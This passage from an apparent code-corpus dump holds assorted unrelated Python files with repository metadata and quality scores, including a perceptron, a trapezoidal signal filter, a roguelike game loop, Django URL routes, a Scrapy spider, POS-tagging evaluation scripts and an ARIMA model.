path=[os.sep.join([self.bundle_dir,'plugins','system','debugger'])],
prefix='plugins.system.debugger.',
onerror=lambda x: None):
if len(modname.split('.'))>4 and '__' not in modname:
self.debug_packages.append(modname)
def run_debug_packages(self):
for modname in self.debug_packages:
try:
module=importlib.import_module(modname)
except Exception as e:
logging.warning('Fail to load debug script <{}>: {}'.format(modname,e))
# pass
# script_path_list=glob.glob(os.sep.join([
# self.bundle_dir,'plugins','system','debugger','*/']))
# module_names = ['.'.join(path.split(os.sep)[-5:-1]) for path in script_path_list]
# module_names = [name+'.'+name.split('.')[-1] for name in module_names]
# module_names = [name for name in module_names if name.split('.')[0] == 'plugins' and '__' not in name]
# for name in module_names:
# print(name)
# try:module=importlib.import_module(name)
# except Exception as e:
# logging.warning('Fail to load debug script <{}>: {}'.format(name,e))
class Test(App):
"""docstring for Test."""
data=ObjectProperty()
plugins=DictProperty()
def __init__(self):
super(Test, self).__init__()
def build(self):
demo=Debugger()
return demo
if __name__ == '__main__':
Test().run()
| 2.046875 | 2 |
supervised_learning/classification/perceptron/perceptron.py | Ambitious-idiot/python-machine-learning | 3 | 16979 | <gh_stars>1-10
import numpy as np
class Perceptron:
def __init__(self, weight, bias=0):
self.weight = weight
self.bias = bias
def __repr__(self):
return 'Perceptron(weight=%r, bias=%r)' % (self.weight, self.bias)
def __get_predictions(self, data):
return np.dot(data, self.weight) + self.bias
def sign(self, input_vec):
prediction = self.__get_predictions(input_vec)
if prediction < 0:
return -1
else:
return 1
def __get_misclassfied_data(self, dataset, labels):
predictions = self.__get_predictions(dataset)
misclassified_vectors = predictions * labels <= 0
misclassified_mat = dataset[misclassified_vectors]
misclassified_predictions = predictions[misclassified_vectors]
misclassified_labels = labels[misclassified_vectors]
return misclassified_mat, misclassified_labels, misclassified_predictions
def __get_loss(self, dataset, labels):
_, _, misclassified_predictions = self.__get_misclassfied_data(dataset, labels)
return abs(misclassified_predictions).sum()
def __optimize_with_sgd(self, dataset, labels, learning_rate=0.1):
misclassified_mat, misclassified_labels, misclassified_predictions \
= self.__get_misclassfied_data(dataset, labels)
rand_index = int(np.random.uniform(0, len(misclassified_labels)))
self.weight = self.weight + learning_rate * misclassified_labels[rand_index] * misclassified_mat[rand_index]
self.bias = self.bias + learning_rate * misclassified_labels[rand_index]
def train(self, dataset, labels, loops=100):
for loop in range(loops):
if self.__get_loss(dataset, labels) == 0:
break
learning_rate = 1 / (1 + loop) + 0.0001
self.__optimize_with_sgd(dataset, labels, learning_rate)
| 2.828125 | 3 |
pygama/dsp/_processors/trap_filter.py | sweigart/pygama | 1 | 16980 | <filename>pygama/dsp/_processors/trap_filter.py
import numpy as np
from numba import guvectorize
@guvectorize(["void(float32[:], int32, int32, float32[:])",
"void(float64[:], int32, int32, float64[:])",
"void(int32[:], int32, int32, int32[:])",
"void(int64[:], int32, int32, int64[:])"],
"(n),(),()->(n)", nopython=True, cache=True)
def trap_filter(wf_in, rise, flat, wf_out):
"""
Symmetric trapezoidal filter
"""
wf_out[0] = wf_in[0]
for i in range(1, rise):
wf_out[i] = wf_out[i-1] + wf_in[i]
for i in range(rise, rise+flat):
wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise]
for i in range(rise+flat, 2*rise+flat):
wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise] - wf_in[i-rise-flat]
for i in range(2*rise+flat, len(wf_in)):
wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise] - wf_in[i-rise-flat] + wf_in[i-2*rise-flat]
| 2.515625 | 3 |
other.py | nunenuh/idcard_datagen | 1 | 16981 |
def is_true(a,b,c,d,e,f,g):
if a>10:
print(10) | 2.859375 | 3 |
pilferer/engine.py | Sebastian-dm/pilferer | 0 | 16982 | <reponame>Sebastian-dm/pilferer<filename>pilferer/engine.py
import tcod
from input_handlers import handle_keys
from game_states import GameStates
from render_functions import clear_all, render_all, RenderOrder
from map_objects.game_map import GameMap
from fov_functions import initialize_fov, recompute_fov
from entity import Entity, get_blocking_entity_at_location
from components.fighter import Fighter
from death_functions import kill_monster, kill_player
VERSION = "0.2"
FONT = 'assets/arial10x10.png'
screen_width = 80
screen_height = 50
map_width = 80
map_height = 45
room_max_size = 10
room_min_size = 6
max_rooms = 30
fov_algorithm = 0
fov_light_walls = False
fov_radius = 10
max_monsters_per_room = 3
colors = {
'dark_wall': tcod.Color(0, 0, 0),
'light_wall': tcod.Color(120, 120, 80),
'dark_ground': tcod.Color(150, 150, 150),
'light_ground': tcod.Color(200, 200, 150)
}
def main():
""" Main game function """
fighter_component = Fighter(hp=30, defense=2, power=5)
player = Entity(0, 0, '@', tcod.white, 'Player', blocks=True,
render_order=RenderOrder.ACTOR, fighter=fighter_component)
entities = [player]
# Import font
tcod.console_set_custom_font(FONT, tcod.FONT_TYPE_GREYSCALE | tcod.FONT_LAYOUT_TCOD)
# Console initialization
tcod.console_init_root(screen_width, screen_height, 'Pilferer %s'%VERSION, False, vsync=False)
con = tcod.console.Console(screen_width, screen_height)
# Mapping
game_map = GameMap(map_width, map_height)
game_map.make_map(max_rooms, room_min_size, room_max_size, map_width,
map_height, player, entities, max_monsters_per_room)
# FOV
fov_recompute = True
fov_map = initialize_fov(game_map)
# Variables for holding input
key = tcod.Key()
mouse = tcod.Mouse()
# Game state
game_state = GameStates.PLAYERS_TURN
# Main game loop
while not tcod.console_is_window_closed():
# FOV
if fov_recompute:
recompute_fov(fov_map, player.x, player.y, fov_radius, fov_light_walls, fov_algorithm)
# Draw
render_all(con, entities, player, game_map, fov_map, fov_recompute, screen_width, screen_height, colors)
fov_recompute = False
tcod.console_flush()
clear_all(con, entities)
# INDPUT HANDLING
tcod.sys_check_for_event(tcod.EVENT_KEY_PRESS, key, mouse)
action = handle_keys(key)
# Command move
player_turn_results = []
move = action.get('move')
if move and game_state == GameStates.PLAYERS_TURN:
dx, dy = move
destination_x = player.x + dx
destination_y = player.y + dy
if not game_map.is_blocked(destination_x, destination_y):
target = get_blocking_entity_at_location(entities, destination_x, destination_y)
if target:
attack_results = player.fighter.attack(target)
player_turn_results.extend(attack_results)
else:
player.move(dx, dy)
fov_recompute = True
game_state = GameStates.ENEMY_TURN
# Command exit
exit = action.get('exit')
if exit:
return True
# Command Fullscreen
fullscreen = action.get('fullscreen')
if fullscreen:
tcod.console_set_fullscreen(not tcod.console_is_fullscreen())
# Results
for player_turn_result in player_turn_results:
message = player_turn_result.get('message')
dead_entity = player_turn_result.get('dead')
if message:
print(message)
if dead_entity:
if dead_entity == player:
message, game_state = kill_player(dead_entity)
else:
message = kill_monster(dead_entity)
print(message)
# Monster turns
if game_state == GameStates.ENEMY_TURN:
for entity in entities:
if entity.ai:
enemy_turn_results = entity.ai.take_turn(player, fov_map, game_map, entities)
for enemy_turn_result in enemy_turn_results:
message = enemy_turn_result.get('message')
dead_entity = enemy_turn_result.get('dead')
if message:
print(message)
if dead_entity:
if dead_entity == player:
message, game_state = kill_player(dead_entity)
else:
message = kill_monster(dead_entity)
print(message)
if game_state == GameStates.PLAYER_DEAD:
break
if game_state == GameStates.PLAYER_DEAD:
break
else:
game_state = GameStates.PLAYERS_TURN
game_state = GameStates.PLAYERS_TURN
if __name__ == '__main__':
main() | 2.3125 | 2 |
galaxy/api/v2/urls.py | SamyCoenen/galaxy | 0 | 16983 | <reponame>SamyCoenen/galaxy
# (c) 2012-2019, Ansible by Red Hat
#
# This file is part of Ansible Galaxy
#
# Ansible Galaxy is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by
# the Apache Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Ansible Galaxy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License
# along with Galaxy. If not, see <http://www.apache.org/licenses/>.
from django.urls import path
from galaxy.api.v2 import views
app_name = 'api'
urlpatterns = [
# Collection Imports URLs
path('collection-imports/<int:pk>/',
views.CollectionImportView.as_view(),
name='collection-import-detail'),
# Collection Version list URLs
path('collections/<int:pk>/versions/',
views.VersionListView.as_view(),
name='version-list'),
path('collections/<str:namespace>/<str:name>/versions/',
views.VersionListView.as_view(),
name='version-list'),
# Collection Version detail URLs
path('collection-versions/<int:version_pk>/',
views.VersionDetailView.as_view(),
name='version-detail'),
path('collections/<str:namespace>/<str:name>/versions/<str:version>/',
views.VersionDetailView.as_view(),
name='version-detail'),
# Collection Version Artifact download URLs
path('collection-versions/<int:pk>/artifact/',
views.CollectionArtifactView.as_view(),
name='version-artifact'),
path('collections/<namespace>/<name>/versions/<version>/artifact/',
views.CollectionArtifactView.as_view(),
name='version-artifact'),
# Collection URLs
path('collections/',
views.CollectionListView.as_view(),
name='collection-list'),
path('collections/<int:pk>/',
views.CollectionDetailView.as_view(),
name='collection-detail'),
# NOTE: needs to come after 'collections/<int:collection_pk>/versions/'
path('collections/<str:namespace>/<str:name>/',
views.CollectionDetailView.as_view(),
name='collection-detail'),
]
| 1.632813 | 2 |
mindhome_alpha/erpnext/stock/doctype/stock_settings/test_stock_settings.py | Mindhome/field_service | 1 | 16984 | # -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestStockSettings(unittest.TestCase):
def setUp(self):
frappe.db.set_value("Stock Settings", None, "clean_description_html", 0)
def test_settings(self):
item = frappe.get_doc(dict(
doctype = 'Item',
item_code = 'Item for description test',
item_group = 'Products',
description = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
)).insert()
settings = frappe.get_single('Stock Settings')
settings.clean_description_html = 1
settings.save()
item.reload()
self.assertEqual(item.description, '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>')
item.delete()
def test_clean_html(self):
settings = frappe.get_single('Stock Settings')
settings.clean_description_html = 1
settings.save()
item = frappe.get_doc(dict(
doctype = 'Item',
item_code = 'Item for description test',
item_group = 'Products',
description = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
)).insert()
self.assertEqual(item.description, '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>')
item.delete()
| 2.125 | 2 |
pybloxy/classes/http.py | R0bl0x10501050/roblox.py | 0 | 16985 | <filename>pybloxy/classes/http.py<gh_stars>0
import logging
import requests
class Http:
def sendRequest(url):
payload = requests.get(str(url))
statusCode = payload.status_code
content = payload.content
if statusCode != 200:
return logging.error(f"[Pybloxy - GET] Something went wrong! Error Code: {statusCode}")
return content
def postRequest(url, payload):
payload = requests.post(str(url), data = payload)
statusCode = payload.status_code
content = payload.content
if statusCode != 200:
return logging.error(f"[Pybloxy - POST] Something went wrong! Error Code: {statusCode}")
return content
def patchRequest(url, payload):
payload = requests.patch(str(url), data = payload)
statusCode = payload.status_code
content = payload.content
if statusCode != 200:
return logging.error(f"[Pybloxy - PATCH] Something went wrong! Error Code: {statusCode}")
return content
def deleteRequest(url, payload):
payload = requests.delete(str(url))
statusCode = payload.status_code
content = payload.content
if statusCode != 200:
return logging.error(f"[Pybloxy - DELETE] Something went wrong! Error Code: {statusCode}")
return content | 2.734375 | 3 |
resources/nuice_simulations/src/layers_sim/layers_sim_node.py | SpyGuyIan/NUice | 1 | 16986 | #!/usr/bin/env python
import rospy
from std_msgs.msg import Float64
import random
possibleLayers = [140, 50, 80, 200, 100]
cur_position = 0.0
def position_callback(msg):
global cur_position
cur_position = msg.data
#Build the layers simulation, then publish material strengths. Lasts 100 seconds.
def runLayersSim():
numLayers = random.randint(10,20)
a = 1
layers = []
while (a < 1000):
size = random.randint(a + 1,1000) - a
strength = getNextLayerStrength()
setNextLayer(size,strength,layers)
a = a + size
pub = rospy.Publisher('material_strength', Float64, queue_size = 10)
rospy.init_node('layers_node', anonymous=True)
rate = rospy.Rate(10)
rospy.Subscriber("/drill_motor/cur_position", Float64, position_callback)
while((not rospy.is_shutdown()) and cur_position < 1000):
pub.publish(layers[int(cur_position)])
rate.sleep()
#Get the strength of the next layer from the list of possible layer strengths.
def getNextLayerStrength():
l = random.randint(0,len(possibleLayers) - 1)
return possibleLayers[l]
#Build the next layer of the simulation.
def setNextLayer(size,strength,layers):
for i in range(1,size):
layers.append(strength)
if __name__ == '__main__':
runLayersSim()
| 2.5625 | 3 |
imagescraper/imagescraper/spiders/image_crawl_spider.py | karthikn2789/Scrapy-Projects | 2 | 16987 | import scrapy
import re
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..items import ImagescraperItem
class ImageCrawlSpiderSpider(CrawlSpider):
name = "image_crawl_spider"
allowed_domains = ["books.toscrape.com"]
def start_requests(self):
url = "http://books.toscrape.com/"
yield scrapy.Request(url=url)
rules = (Rule(LinkExtractor(allow=r"catalogue/"), callback="parse_image", follow=True),)
def parse_image(self, response):
if response.xpath('//div[@class="item active"]/img').get() is not None:
img = response.xpath('//div[@class="item active"]/img/@src').get()
"""
Computing the Absolute path of the image file.
"image_urls" require absolute path, not relative path
"""
m = re.match(r"^(?:../../)(.*)$", img).group(1)
url = "http://books.toscrape.com/"
img_url = "".join([url, m])
image = ImagescraperItem()
image["image_urls"] = [img_url] # "image_urls" must be a list
yield image
| 2.921875 | 3 |
scripts/pos_eval.py | ProKil/sparse-text-prototype | 19 | 16988 | import os
import argparse
import subprocess
import random
import edlib
from typing import List
from collections import Counter
import stanza
class ExtractMetric(object):
"""used for precision recall"""
def __init__(self, nume=0, denom_p=0, denom_r=0, precision=0, recall=0, f1=0):
super(ExtractMetric, self).__init__()
self.nume = nume
self.denom_p = denom_p
self.denom_r = denom_r
self.precision = precision
self.recall = recall
self.f1 = f1
def read_file(fname, len_cut):
res1, res2 = [], []
with open(fname) as fin:
for line in fin:
x, y = line.rstrip().split('\t')
if len(x.split()) > len_cut or len(y.split()) > len_cut:
continue
res1.append(x)
res2.append(y)
return res1, res2
def write_file(fname: str, data: List[str]):
with open(fname, 'w') as fout:
for sent in data:
if isinstance(sent, list):
fout.write('{}\n'.format(' '.join(sent)))
else:
fout.write('{}\n'.format(sent))
def eval_edit(prototype, example):
def flat_cigar(cigar):
"""flatten the result path returned by edlib.align
"""
r = []
pointer = 0
while pointer < len(cigar):
num = []
while cigar[pointer].isdigit():
num.append(cigar[pointer])
pointer += 1
num = int(''.join(num))
r.extend([cigar[pointer]] * num)
pointer += 1
return r
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
edit_operation = edlib.align(e_text, p_text, task='path')
edit_operation = flat_cigar(edit_operation['cigar'])
new_p_text = []
new_e_text = []
new_p_pos = []
new_e_pos = []
src_cur = tgt_cur = 0
for edit in edit_operation:
if edit == '=' or edit == 'X':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
src_cur += 1
tgt_cur += 1
elif edit == 'I':
new_p_text.append(-1)
new_p_pos.append(-1)
new_e_text.append(e_text[tgt_cur])
new_e_pos.append(e_pos[tgt_cur])
tgt_cur += 1
elif edit == 'D':
new_p_text.append(p_text[src_cur])
new_p_pos.append(p_pos[src_cur])
new_e_text.append(-1)
new_e_pos.append(-1)
src_cur += 1
else:
raise ValueError('{} edit operation is invalid!'.format(edit))
for i, edit in enumerate(edit_operation):
if edit not in res:
res[edit] = Counter()
if edit == '=':
res[edit]['{}={}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'X':
res[edit]['{}->{}'.format(new_p_pos[i], new_e_pos[i])] += 1
elif edit == 'I':
res[edit]['+{}'.format(new_e_pos[i])] += 1
elif edit == 'D':
res[edit]['-{}'.format(new_p_pos[i])] += 1
else:
raise ValueError
return res
def eval_f1(prototype, example):
res = {}
for p_sent, e_sent in zip(prototype, example):
p_pos = [x.upos for x in p_sent.words]
e_pos = [x.upos for x in e_sent.words]
p_text = [x.text for x in p_sent.words]
e_text = [x.text for x in e_sent.words]
e_word_counter = Counter(e_text)
for word, pos in zip(p_text, p_pos):
if pos not in res:
res[pos] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[pos].denom_r += 1
if e_word_counter[word] > 0:
e_word_counter[word] -= 1
res[pos].nume += 1
e_pos_counter = Counter(e_pos)
for k, v in e_pos_counter.items():
if k not in res:
res[k] = ExtractMetric(
nume=0,
denom_p=0,
denom_r=0,
precision=0,
recall=0,
f1=0
)
res[k].denom_p += v
for k, v in res.items():
if res[k].denom_p != 0 and res[k].denom_r != 0 and res[k].nume != 0:
res[k].precision = res[k].nume / res[k].denom_p
res[k].recall = res[k].nume / res[k].denom_r
res[k].f1 = 2 * res[k].precision * res[k].recall / (res[k].precision + res[k].recall)
return res
def sentence_bleu(ref_path, hypo_path):
sent_bleu = subprocess.getoutput(
"fairseq-score --ref {} --sys {} --sentence-bleu".format(ref_path, hypo_path))
bleu_list = [float(line.split()[3].rstrip(',')) for line in sent_bleu.split('\n')[1:]]
return sum(bleu_list) / len(bleu_list)
def generate_rand_prototype(exp_dir, num):
dataset_to_template = {
"coco40k": "support_prototype/datasets/coco/coco.template.40k.txt",
"yelp": "support_prototype/datasets/yelp_data/yelp.template.50k.lower.txt",
"yelp_large": "support_prototype/datasets/yelp_large_data/yelp_large.template.100k.txt",
}
def parse_exp_dir(name):
dataset = name.rstrip('/').split('/')[-1].split('_')[0]
return dataset
dataset = parse_exp_dir(exp_dir)
return subprocess.getoutput(
"shuf -n {} {}".format(num, dataset_to_template[dataset])).split('\n')
parser = argparse.ArgumentParser(description='Evaluate analysis metrics')
parser.add_argument('--prefix', type=str, choices=['inference', 'generation'],
help='prediction file prefix')
parser.add_argument('--exp-dir', type=str, help='output directory')
args = parser.parse_args()
fout = open(os.path.join(args.exp_dir, 'analysis_{}_res.txt'.format(args.prefix)), 'w')
len_cut = 1000
prototypes, examples = read_file(os.path.join(args.exp_dir, '{}_analysis_input.txt'.format(args.prefix)), len_cut=len_cut)
prototype_path = os.path.join(args.exp_dir, 'prototype.txt')
prototype_pos_path = os.path.join(args.exp_dir, 'prototype_pos.txt')
prototype_rand_path = os.path.join(args.exp_dir, 'prototype_rand.txt')
prototype_pos_rand_path = os.path.join(args.exp_dir, 'prototype_pos_rand.txt')
example_path = os.path.join(args.exp_dir, 'example.txt')
example_pos_path = os.path.join(args.exp_dir, 'example_pos.txt')
prototypes_rand = generate_rand_prototype(args.exp_dir, len(examples))
write_file(prototype_path, prototypes)
write_file(example_path, examples)
write_file(prototype_rand_path, prototypes_rand)
# surface BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_rand_path))
bleu = sentence_bleu(prototype_rand_path, example_path)
print('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('Regular BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_path, example_path))
bleu = sentence_bleu(prototype_path, example_path)
print('Regular BLEU: \n{}'.format(bleu))
fout.write('Regular BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# POS tagging
print('POS tagging')
nlp = stanza.Pipeline(lang='en', processors='tokenize,mwt,pos', tokenize_pretokenized=True)
prototype_doc = nlp('\n'.join(prototypes))
example_doc = nlp('\n'.join(examples))
prototype_rand_doc = nlp('\n'.join(prototypes_rand))
prototypes_pos = [[word.upos for word in sent.words] for sent in prototype_doc.sentences]
examples_pos = [[word.upos for word in sent.words] for sent in example_doc.sentences]
prototypes_pos_rand = [[word.upos for word in sent.words]for sent in prototype_rand_doc.sentences]
write_file(prototype_pos_path, prototypes_pos)
write_file(example_pos_path, examples_pos)
write_file(prototype_pos_rand_path, prototypes_pos_rand)
# POS BLEU
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_rand_path))
bleu = sentence_bleu(prototype_pos_rand_path, example_pos_path)
print('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('POS BLEU (random baseline): \n{}'.format(bleu))
fout.write('\n\n\n')
# bleu = subprocess.getoutput(
# "./support_prototype/scripts/multi-bleu.perl {} < {}".format(prototype_pos_path, example_pos_path))
bleu = sentence_bleu(prototype_pos_path, example_pos_path)
print('POS BLEU: \n{}'.format(bleu))
fout.write('POS BLEU: \n{}'.format(bleu))
fout.write('\n\n\n')
# break down precision and recall
print("compute precision, recall, f1")
assert len(prototypes) == len(prototypes_pos)
assert len(examples) == len(examples_pos)
res = eval_f1(list(prototype_rand_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('random baseline precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
res = eval_f1(list(prototype_doc.sentences), list(example_doc.sentences))
res = sorted(res.items(), key=lambda item: -item[1].f1)
fout.write('precision-recall\n')
fout.write('POS recall precision f1\n')
for k, v in res:
fout.write('{} {} {} {}\n'.format(k, v.recall, v.precision, v.f1))
fout.write('\n\n\n')
# edit operations
print("edit analysis")
res = eval_edit(list(prototype_doc.sentences), list(example_doc.sentences))
total = sum([sum(v.values()) for k, v in res.items()])
fout.write('total: {}\n'.format(total))
res = sorted(res.items(), key=lambda item: (-sum(item[1].values())))
for k, v in res:
fout.write('{}: {}\n'.format(k, sum(v.values())))
for k1, v1 in v.most_common():
fout.write('{}: {} ({:.3f}), '.format(k1, v1, v1 / sum(v.values())))
fout.write('\n\n')
fout.close()
| 2.578125 | 3 |
tests/rules/test_git_stash_pop.py | RogueScholar/thefuck-termux | 0 | 16989 | <reponame>RogueScholar/thefuck-termux
import pytest
from thefuck.rules.git_stash_pop import get_new_command
from thefuck.rules.git_stash_pop import match
from thefuck.types import Command
@pytest.fixture
def output():
return """error: Your local changes to the following files would be overwritten by merge:"""
def test_match(output):
assert match(Command("git stash pop", output))
assert not match(Command("git stash", ""))
def test_get_new_command(output):
assert (get_new_command(
Command("git stash pop",
output)) == "git add --update && git stash pop && git reset .")
| 2.1875 | 2 |
src/arima_model.py | SaharCarmel/ARIMA | 0 | 16990 | """ The ARIMA model. """
import torch
import numpy as np
class ARIMA(torch.nn.Module):
"""ARIMA [summary]
"""
def __init__(self,
p: int = 0,
d: int = 0,
q: int = 0) -> None:
"""__init__ General ARIMA model constructor.
Args:
p (int): The number of lag observations included in the model,
also called the lag order.
d (int): The number of times that the raw observations are
differenced, also called the degree of differencing.
q (int): The size of the moving average window,
also called the order of moving average.
"""
super(ARIMA, self).__init__()
self.p = p
self.pWeights = torch.rand(p)
self.pWeights.requires_grad = True
self.q = q
self.qWeights = torch.rand(q)
self.qWeights.requires_grad = True
self.d = d
self.dWeights = torch.rand(d)
self.dWeights.requires_grad = True
self.drift = torch.rand(1)
pass
def forward(self, x: torch.Tensor, err: torch.Tensor) -> torch.Tensor:
"""forward the function that defines the ARIMA(0,1,1) model.
It was written specifically for the case of ARIMA(0,1,1).
Args:
x (torch.Tensor): The input data. All the past observations
err (torch.Tensor): The error term. A normal distribution vector.
Returns:
torch.Tensor: The output of the model. The current prediction.
"""
zData = torch.diff(x)
zPred = self.dWeights*zData[-1] + \
self.qWeights*err[-2] + err[-1] + self.drift
aPred = zPred + x[-1]
return aPred
def generateSample(self, length: int) -> torch.Tensor:
"""generateSample An helper function to generate a sample of data.
Args:
length (int): The length of the sample.
Returns:
torch.Tensor: The generated sample.
"""
sample = torch.zeros(length)
noise = torch.tensor(np.random.normal(
loc=0, scale=1, size=length), dtype=torch.float32)
sample[0] = noise[0]
with torch.no_grad():
for i in range(length-2):
sample[i+2] = self.forward(sample[:i+2], noise[:i+2])
pass
return sample
def fit(self,
trainData: torch.Tensor,
epochs: int,
learningRate: float) -> None:
"""fit A function to fit the model. It is a wrapper of the
Args:
trainData (torch.Tensor): The training data.
epochs (int): The number of epochs.
learningRate (float): The learning rate.
"""
dataLength = len(trainData)
errors = torch.tensor(np.random.normal(
loc=0, scale=1, size=dataLength), dtype=torch.float32)
for epoch in range(epochs):
prediction = torch.zeros(dataLength)
for i in range(dataLength-2):
prediction[i +
2] = self.forward(trainData[0:i+2], errors[0:i+2])
pass
loss = torch.mean(torch.pow(trainData - prediction, 2))
print(f'Epoch {epoch} Loss {loss}')
loss.backward()
self.dWeights.data = self.dWeights.data - \
learningRate * self.dWeights.grad.data
self.dWeights.grad.data.zero_()
self.qWeights.data = self.qWeights.data - \
learningRate * self.qWeights.grad.data
self.qWeights.grad.data.zero_()
pass
| 3.578125 | 4 |
problems/slidingwindow/Solution1100.py | akalu/cs-problems-python | 0 | 16991 | """
Sliding window
Given a string S, return the number of substrings of length K with no
repeated characters.
Example 1:
Input: S = "havefunonleetcode", K = 5 Output: 6 Explanation: There are 6
substrings they are : 'havef','avefu','vefun','efuno','etcod','tcode'.
counter havefunonleetcode
IDEA:
1) for each letter in the string setup a counter and
2) update unique counter each time when counter[let] hits 0, 1 or 2 (magic numbers)
aaabac
|||
123
0) a:3 unique=0
1) a:2 b:1 unique=1
2) a:2 b:1 unique=1
3) a:2 b:1 c:1 unique=1+2=3
"""
class Solution1100:
pass
| 3.953125 | 4 |
the_file_propagator/__init__.py | joeflack4/the-file-propagator | 0 | 16992 | """The File Propagator"""
| 1.007813 | 1 |
src/wa_kat/templates/static/js/Lib/site-packages/components/keyword_handler.py | WebArchivCZ/WA-KAT | 3 | 16993 | <gh_stars>1-10
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: brython (http://brython.info) (like python3)
#
# Imports =====================================================================
from os.path import join
from browser import window
from browser import document
# virtual filesystem / modules provided by REST API
from virtual_fs import settings
# Functions & classes =========================================================
class KeywordListHandler(object):
"""
This class is used to control the GUI for the list of keywords.
It allows user to add new keyword, remove present keyword and get a list
of defined keywords.
"""
def __init__(self, el_id, whole_id=None):
if whole_id is None:
whole_id = "whole_" + el_id
self.el = document[el_id]
self.whole_el = document[whole_id]
self.all_lists_el = document["whole_keyword_list"]
self.keywords = []
self._remover = """
<span class='kw_remover'
title='Odstranit klíčové slovo.'
id='kw_remover_id_%d'>
✖
</span>
"""
self._render()
def _render(self):
"""
Render the HTML code for all the :attr:`keywords` stored in this class.
This method is called after each change in :attr:`keywords`.
"""
# hide the list in case that there is no `keyword` to be displayed
if self.keywords:
self.whole_el.style.display = "block"
self.all_lists_el.style.display = "block"
else:
self.whole_el.style.display = "none"
if "<li>" not in self.all_lists_el.html:
self.all_lists_el.style.display = "none"
# construct the HTML code for each keyword
html_lines = (
"<li class='kw_enum'>{0} {1}</li>\n".format(
keyword,
(self._remover % cnt)
)
for cnt, keyword in enumerate(self.keywords)
)
# put the keywords into the HTML code of the page
self.el.innerHTML = "<ol>\n%s\n</ol>\n" % "\n".join(html_lines)
# this function is used to bind the ✖ to function for removing the
# keyword
def keyword_remover(keyword):
def remover(ev):
self.remove_keyword(keyword)
return remover
# go thru all the keywords and bind them to keyword_remover()
for cnt, keyword in enumerate(self.keywords):
uid = "kw_remover_id_%d" % cnt
el = document[uid]
el.bind("click", keyword_remover(keyword))
def add_keyword(self, keyword):
"""
Add `keyword` to :attr:`keywords`.
Args:
keyword (str): New keyword.
"""
self.keywords.append(keyword)
self._render()
def remove_keyword(self, keyword):
"""
Remove `keyword` from :attr:`keywords`.
Args:
keyword (str): Keyword which should be removed.
"""
self.keywords.remove(keyword)
self._render()
def reset(self):
"""
Reset the widget to the default state.
"""
self.keywords = []
self._render()
UserKeywordHandler = KeywordListHandler("user_keyword_list")
AlephKeywordHandler = KeywordListHandler("aleph_keyword_list")
AanalysisKeywordHandler = KeywordListHandler("analysis_keyword_list")
class KeywordAdder(object):
"""
This class is here to controll typeahead input bar with keyword suggestion.
Keywords selected from suggestions are then mapped to
:class:`KeywordListHandler`.
"""
intput_el = document["keyword_adder"]
@classmethod
def on_select_callback(cls, selected_item):
"""
This method defines the action taken when user selects the keyword from
suggestion engine.
Args:
selected_item (str): Keyword selected by the user.
Returns:
str: Value on which the <input> element will be set.
"""
UserKeywordHandler.add_keyword(selected_item)
return ""
@classmethod
def set_kw_typeahead_input(cls):
"""
Map the typeahead input to remote dataset.
"""
# get reference to parent element
parent_id = cls.intput_el.parent.id
if "typeahead" not in parent_id.lower():
parent_id = cls.intput_el.parent.parent.id
window.make_keyword_typeahead_tag(
"#" + parent_id,
join(settings.API_PATH, "kw_list.json"),
cls.on_select_callback,
)
KeywordAdder.set_kw_typeahead_input()
| 3.03125 | 3 |
scripts/rnn/gru/__init__.py | bfeng/CryptoGRU | 1 | 16994 | from .grucell import MyGRUCell
from .gru import MyGRU | 1.078125 | 1 |
